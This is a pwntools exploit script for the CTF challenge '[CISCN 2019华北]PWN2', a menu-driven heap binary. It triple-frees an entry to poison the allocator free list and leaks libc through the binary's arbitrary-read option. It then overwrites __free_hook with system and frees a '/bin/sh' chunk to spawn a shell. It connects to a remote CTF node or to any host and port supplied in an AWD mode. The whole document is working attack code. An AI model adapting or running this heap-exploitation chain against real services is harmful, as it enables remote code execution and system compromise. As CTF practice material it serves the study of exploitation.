Problem: [CISCN 2019华北]PWN2
[[toc]]
from pwn import *
import sys
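def _as_delim(delim):
    """Normalise a recv/send delimiter for the tube helpers below.

    Bug fix: the original helpers wrapped every delimiter in ``str()``.  For a
    ``bytes`` delimiter (e.g. ``b'Index:'``) that yields the literal text
    ``"b'Index:'"``, which the target never prints, so the helper would block
    until the tube times out.  ``bytes``/``bytearray`` now pass through
    untouched; every other type still gets the old ``str()`` coercion, so the
    existing ``str`` call sites behave exactly as before.
    """
    if isinstance(delim, (bytes, bytearray)):
        return delim
    return str(delim)


# Thin wrappers over the global tube ``io`` (bound later by ``io = start(...)``;
# ``io`` is looked up at call time, so none of these may run before that line).
def s(data):
    """Send *data* with no trailing newline."""
    return io.send(data)


def sa(delim, data):
    """Wait until *delim* is seen on the tube, then send *data* (no newline)."""
    return io.sendafter(_as_delim(delim), data)


def sl(data):
    """Send *data* followed by a newline."""
    return io.sendline(data)


def sla(delim, data):
    """Wait until *delim* is seen, then send *data* plus a newline."""
    return io.sendlineafter(_as_delim(delim), data)


def r(num):
    """Receive up to *num* bytes."""
    return io.recv(num)


def ru(delims, drop=True):
    """Receive until *delims*; the delimiter itself is dropped by default."""
    return io.recvuntil(delims, drop)


def rl():
    """Receive one line."""
    return io.recvline()


def itr():
    """Hand the tube to the user (interactive mode)."""
    return io.interactive()


def uu32(data):
    """Unpack up to 4 bytes (context endianness), zero-padding short input on the right."""
    return u32(data.ljust(4, b'\x00'))


def uu64(data):
    """Unpack up to 8 bytes (context endianness), zero-padding short input on the right."""
    return u64(data.ljust(8, b'\x00'))


def ls(data):
    """``log.success`` shorthand."""
    return log.success(data)


def lss(s):
    """Log ``<expr> --> 0x<value>`` (bold red) for a variable or expression name.

    *s* is evaluated with ``eval`` in this script's namespace.  Only ever pass
    trusted literal text written in this file (``lss('libc_base')``); never
    feed it anything received from the target, or a malicious/compromised
    service gets code execution on the attacker's machine.
    """
    return log.success('\033[1;31;40m%s --> 0x%x \033[0m' % (s, eval(s)))


context.arch = 'amd64'
context.log_level = 'debug'   # pwntools prints every send/recv; lower to 'info' for quieter runs
context.terminal = ['tmux', 'splitw', '-h', '-l', '130']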
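def start(binary, argv=None, *a, **kw):
    """Start the exploit against the target and return a pwntools tube.

    The target is selected by pwntools ``args`` switches on the command line:

    * ``GDB`` -- run *binary* locally under gdb using the module-level
      ``gdbscript`` string (must be defined before this is called).
    * ``RE``  -- connect to the hard-coded remote CTF instance.
    * ``AWD`` -- connect to ``sys.argv[1]:sys.argv[2]``.  The usage line in
      the branch implies pwntools has already stripped the ``AWD`` token from
      ``sys.argv`` so that host and port are the first two remaining arguments.
    * otherwise -- run *binary* locally as a child process.

    ``argv`` defaults to ``None`` (treated as an empty list) instead of a
    shared mutable ``[]``; any sequence is accepted.  Extra positional and
    keyword arguments are forwarded to ``gdb.debug`` / ``process``.

    Raises ``IndexError`` in AWD mode when host/port are missing and
    ``ValueError`` when the port is not an integer.
    """
    if argv is None:
        argv = []
    cmd = [binary] + list(argv)
    if args.GDB:
        return gdb.debug(cmd, gdbscript=gdbscript, *a, **kw)
    if args.RE:
        return remote('node4.anna.nssctf.cn', 28756)
    if args.AWD:
        # usage: python3 exp.py AWD 1.1.1.1 PORT
        IP = str(sys.argv[1])
        PORT = int(sys.argv[2])
        return remote(IP, PORT)
    return process(cmd, *a, **kw)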
# Target selection.  ``libelf`` may name an explicit libc build to use instead
# of the one pwntools resolves for the binary.
binary = './pwn1'
libelf = ''

if binary != '':
    elf = ELF(binary)
    rop = ROP(binary)
    # NOTE(review): elf.libc can be None when pwntools cannot locate a libc for
    # the binary; the later libc.sym[...] lookups would then fail -- confirm.
    libc = elf.libc
if libelf != '':
    libc = ELF(libelf)

# Commands fed to gdb in GDB mode; ``#continue`` is left commented so the
# debugger stops at the entry point.  format() lets the script interpolate
# module-level values into the script if fields are added later.
gdbscript = '''
#continue
'''.format(**locals())

io = start(binary)
def add(name, age):
    """Menu option 1: create an entry with raw *name* bytes and *age*.

    Both fields are sent without a trailing newline, so the target is assumed
    to read them with fixed-size reads; *age* goes out as decimal text.
    """
    sla(': ', '1')
    sa('name:', name)
    sa('age:', str(age))
def rm(idx):
    """Menu option 2: delete the entry at *idx*.

    Nothing here prevents deleting the same index repeatedly -- the exploit
    relies on the binary allowing exactly that.
    """
    sla(': ', '2')
    sla('Index:', str(idx))
def edit(idx, name, age):
    """Menu option 3: overwrite the entry at *idx* with raw *name* bytes and *age*.

    Same wire format as ``add``: index sent as a line, name/age sent without
    newline after their prompts.
    """
    sla(': ', '3')
    sla('Index:', str(idx))
    sa('name:', name)
    sa('age:', str(age))
def show(idx):
    """Menu option 4: display the entry at *idx* and parse it.

    Returns ``(name, age, money)``: ``name`` is the raw bytes printed between
    ``'name: '`` and ``'age: '``; ``age`` and ``money`` are parsed as ints.

    NOTE(review): the ``age`` delimiter is ``'\\nnmoney: '`` with a doubled
    ``n``.  If the target actually prints ``money: `` this call blocks until
    timeout.  The exploit below never calls ``show``, so this has not been
    exercised -- check against the binary's real output before relying on it.
    """
    sla(': ', '4')
    sla('Index:', str(idx))
    ru('name: ')
    name = ru('age: ')
    age = int(ru('\nnmoney: '))
    money = int(ru('\n'))
    return name, age, money
def add_money(idx):
    """Menu option 5 for the entry at *idx*.

    Unlike the other helpers this does not wait for an ``Index:`` prompt
    before sending the index -- presumably option 5 prints none.  If the
    exploit desynchronises around this call, confirm that against the binary.
    """
    sla(': ', '5')
    sl(str(idx))
def gift(idx, addr, size):
    """Menu option 6: the arbitrary-read primitive the binary hands out.

    Sends *idx*, then *addr* as a ``0x``-prefixed hex string and *size* as a
    decimal at the two successive ``leak:`` prompts, and returns the raw bytes
    the target prints between ``[[[`` and ``]]]``.
    """
    sla(': ', '6')
    sla('Index:', str(idx))
    sla('leak:', hex(addr))
    sla('leak:', str(size))
    ru('[[[')
    return ru(']]]')
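# ---- exploit ----------------------------------------------------------------
# Stage 1: corrupt the allocator free list.  Entry 0 is freed three times in a
# row (the binary evidently lets the same index be freed repeatedly), then the
# next add writes p64(0x602060) into the recycled chunk.  For a tcache/fastbin
# chunk the first 8 user bytes are the next-pointer, so this presumably poisons
# the list so that a following add is served at 0x602060 -- a fixed address in
# what looks like the non-PIE binary's data segment.  Stage 3 relies on it.
add('A' * 8, 0x1)
rm(0)
rm(0)
rm(0)
add(p64(0x602060), 0x3)
add('BBB', 0x3)
add(p64(0x602060), 0x602078)

# Stage 2: leak libc.  gift() reads 8 bytes at 0x601F88; subtracting
# libc.sym['free'] treats that slot as free@GOT (free's resolved address).
libc_base = uu64(gift(1, 0x601F88, 8)) - libc.sym['free']
lss('libc_base')
# A libc mapping is page aligned.  A misaligned base means the 8 bytes were
# not free's address (wrong libc build, wrong GOT slot, desynchronised menu);
# abort now instead of writing garbage through __free_hook.  log.error raises.
if libc_base & 0xfff:
    log.error('libc_base 0x%x is not page aligned -- bad leak or wrong libc' % libc_base)

# Stage 3: __free_hook -> system.  Both writes go through entry 0, which after
# stage 1 presumably aliases the entry table itself: the first edit points the
# slot at __free_hook, the second writes system's address through it.  The
# role of add_money(0) here is not evident from the script -- confirm in gdb.
add_money(0)
edit(0, p64(libc_base + libc.sym['__free_hook']), 1)
edit(0, p64(libc_base + libc.sym['system']), 1)

# Stage 4: trigger.  Free slot 2, refill it with "/bin/sh\0", free it again so
# free("/bin/sh") becomes system("/bin/sh").
rm(2)
add('/bin/sh\x00', 0x1)
rm(2)
#gdb.attach(io,gdbscript)
itr()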
